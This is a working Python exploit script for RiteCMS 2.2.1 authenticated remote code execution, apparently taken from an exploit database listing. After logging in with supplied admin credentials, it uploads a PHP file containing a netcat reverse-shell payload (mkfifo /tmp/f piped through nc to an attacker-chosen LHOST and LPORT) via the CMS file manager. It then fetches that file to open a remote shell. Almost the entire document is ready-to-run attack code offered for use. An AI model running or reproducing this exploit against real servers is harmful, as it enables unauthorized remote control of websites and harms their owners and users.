Rite CMS version 2.2.1 authenticated remote code execution exploit. Original finding for remote code execution in this version of Rite CMS is attributed to Enes Ozeser.
ae908efdadf489d50daf07ce1577dbb2
# Exploit Title: RiteCMS 2.2.1 - Authenticated Remote Code Execution
# Date: 2020-07-03
# Exploit Author: H0j3n
# Vendor Homepage: http://ritecms.com/
# Software Link: http://sourceforge.net/projects/ritecms/files/ritecms_2.2.1.zip/download
# Version: 2.2.1
# Tested on: Linux
# Reference: https://www.exploit-db.com/exploits/48636
# !/usr/bin/python
# coding=utf-8
import requests,sys,base64,os
from colorama import Fore, Back, Style
from requests_toolbelt.multipart.encoder import MultipartEncoder
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
# Variable
CONTENT = '''<form action="index.php" method="post">'''
# Header
def header():
top = cyan('''
\t _____ _ _ _____ __ __ _____
\t| __ \(_) | / ____| \/ |/ ____|
\t| |__) |_| |_ ___| | | \ / | (___ ___ ___ ___
\t| _ /| | __/ _ \ | | |\/| |\___ \ _ __ |_ | |_ | < /
\t| | \ \| | || __/ |____| | | |____) | | |/ / / __/_ / __/_ / /
\t|_| \_\_|\__\___|\_____|_| |_|_____/ |___/ /____(_)____(_)_/
''')
return top
def info():
top = cyan('''
[+] IP : {0}
[+] USERNAME : {1}
[+] PASSWORD : {2}
'''.format(IP,USER,PASS))
return top
# Request Function
# Color Function
def cyan(STRING):
return Style.BRIGHT+Fore.CYAN+STRING+Fore.RESET
def red(STRING):
return Style.BRIGHT+Fore.RED+STRING+Fore.RESET
# Main
if __name__ == "__main__":
print header()
print "\t--------------------------------------------------------------"
print "\t| RiteCMS v2.2.1 - Authenticated Remote Code Execution |"
print "\t--------------------------------------------------------------"
print "\t| Reference : https://www.exploit-db.com/exploits/48636 |"
print "\t| By : H0j3n |"
print "\t--------------------------------------------------------------"
if len(sys.argv) == 1:
print red("[+] Usage :\t\t python %s http://10.10.10.10 admin:admin" % sys.argv[0])
print cyan("\n[-] Please Put IP & Credentials")
sys.exit(-1)
if len(sys.argv) == 2:
print red("[+] Usage :\t\t python %s http://10.10.10.10 admin:admin" % sys.argv[0])
print cyan("\n[-] Please Put Credentials")
sys.exit(-1)
if len(sys.argv) > 3:
print red("[+] Usage :\t\t python %s http://10.10.10.10 admin:admin" % sys.argv[0])
print cyan("\n[-] Only 2 arguments needed please see the usage!")
sys.exit(-1)
IP = sys.argv[1]
USER,PASS = sys.argv[2].split(":")
print info()
URL='{0}/cms/index.php'.format(IP)
URL_UPLOAD = URL + '?mode=filemanager&action=upload&directory=media'
HEAD = {"User-Agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"}
LOG_INFO = {"username" : USER, "userpw" : PASS}
try:
with requests.Session() as SESSION:
SESSION.get(URL)
SESSION.post(URL, data=LOG_INFO, headers=HEAD,allow_redirects=False)
except:
print red("[-] Check the URL!")
sys.exit(-1)
if CONTENT in str(SESSION.get(URL_UPLOAD).text):
print red("[-] Cannot Login!")
sys.exit(-1)
else:
print cyan("[+] Credentials Working!")
LHOST = str(raw_input("Enter LHOST : "))
LPORT = str(raw_input("Enter LPORT : "))
FILENAME = str(raw_input("Enter FileName (include.php) : "))
PAYLOAD = "<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {0} {1} >/tmp/f'); ?>".format(LHOST,LPORT)
FORM_DATA = {
'mode': (None,'filemanager'),
'file': (FILENAME, PAYLOAD),
'directory': (None, 'media'),
'file_name': (None, ''),
'upload_mode': (None, '1'),
'resize_xy': (None, 'x'),
'resize': (None, '640'),
'compression': (None, '80'),
'thumbnail_resize_xy': (None, 'x'),
'thumbnail_resize': (None, '150'),
'thumbnail_compression': (None, '70'),
'upload_file_submit': (None, 'OK - Upload file')
}
HEADER_UPLOAD = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Referer': URL_UPLOAD
}
response = SESSION.post(URL,files=FORM_DATA,headers=HEADER_UPLOAD)
if FILENAME in response.text:
print cyan("\n[+] File uploaded and can be found!")
else:
print red("[-] File cannot be found or use different file name!")
sys.exit(-1)
URL_GET = IP + '/media/{0}'.format(FILENAME)
OPTIONS = str(raw_input("Exploit Now (y/n)?"))
print cyan("\nW0rk1ng!!! Enjoy :)")
SESSION.get(URL_GET)